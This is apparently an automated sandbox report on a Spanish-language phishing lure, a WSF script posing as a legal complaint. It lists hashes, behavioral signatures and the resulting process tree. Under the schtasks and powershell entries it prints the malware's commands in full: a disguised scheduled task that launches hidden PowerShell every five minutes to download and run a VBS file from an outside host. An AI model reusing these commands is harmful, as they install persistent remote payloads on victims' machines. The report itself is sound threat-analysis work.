Analysis

max time kernel: 343s
max time network: 346s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 27/09/2022, 06:42
Static task: static1
Behavioral task: behavioral1
Sample: Denuncia en su contra y detalles de la citacion.wsf
Resource: win7-20220812-en
General

Target: Denuncia en su contra y detalles de la citacion.wsf
Size: 171KB
MD5: abba9bfa9425c66df09fe00a63876ece
SHA1: 3c2e055f21cdb118619497f70e4a6882265c7ef8
SHA256: c738d9ae6eec6bb34b54cf66de709a61c6c7d22d98d8762fdf6b5b5b9c48021b
SHA512: 31bfa060814416d73b0fd5de00c09491b4386bea8a036c248b27de04f96f17de2068538d627dca756bad52f6347d1ce4b5106a01d7e1cdbff3569d3e4f63ce3f
SSDEEP: 48:oyRZ4meLOL8GELn2HH+ukgSHoUFIgEciIZJ9GFnFqFTF8RZFnFDwF4FuFMFZF/yu:oi4meawMkg0LFIguSJERt+UZ6K8y
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.

  description                                                                         pid   pid_target  Process       procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process  1148  1364        schtasks.exe  27

Drops file in System32 directory (2 IoCs)

  description                    ioc                                                                                                                        Process
  File opened for modification   C:\Windows\system32\taskschd.msc                                                                                           mmc.exe
  File opened for modification   C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk   powershell.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

  pid   Process
  1148  schtasks.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)

  pid   Process
  1500  powershell.exe

Suspicious behavior: GetForegroundWindowSpam (1 IoC)

  pid   Process
  1064  mmc.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)

  description                        pid   Process
  Token: 33                          1064  mmc.exe
  Token: SeIncBasePriorityPrivilege  1064  mmc.exe
  (the two rows above alternate, 32 times each, for 64 entries in total)

Suspicious use of SetWindowsHookEx (2 IoCs)

  pid   Process
  1064  mmc.exe
  1064  mmc.exe

Suspicious use of WriteProcessMemory (3 IoCs)

  description                       pid   Process      procid_target
  PID 1548 wrote to memory of 1500  1548  taskeng.exe  32
  PID 1548 wrote to memory of 1500  1548  taskeng.exe  32
  PID 1548 wrote to memory of 1500  1548  taskeng.exe  32
Processes

C:\Windows\System32\WScript.exe (PID 1944)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Denuncia en su contra y detalles de la citacion.wsf"

C:\Windows\system32\schtasks.exe (PID 1148)
  Command line: schtasks /create /sc MINUTE /mo 5 /tn "OneDrive Reporting Tas" /tr "\"%windir%\system32\WindowsPowershell\v1.0\powershell.exe\" -Windowstyle Hidden $a = wget 'https://notificacionesdelafiscalia.com/t52ph4t' -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs" /F
  Signatures: Process spawned unexpected child process; Creates scheduled task(s)

C:\Windows\system32\mmc.exe (PID 1064)
  Command line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
  Signatures: Drops file in System32 directory; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

C:\Windows\system32\taskeng.exe (PID 1548)
  Command line: taskeng.exe {7F8BACB4-89A1-4004-B080-CED057815914} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe (PID 1500, child of PID 1548)
    Command line: C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -Windowstyle Hidden $a = wget "https://notificacionesdelafiscalia.com/t52ph4t" -o C:\Windows\Temp\t.vbs;start-sleep 5;start-Process C:\Windows\Temp\t.vbs
    Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses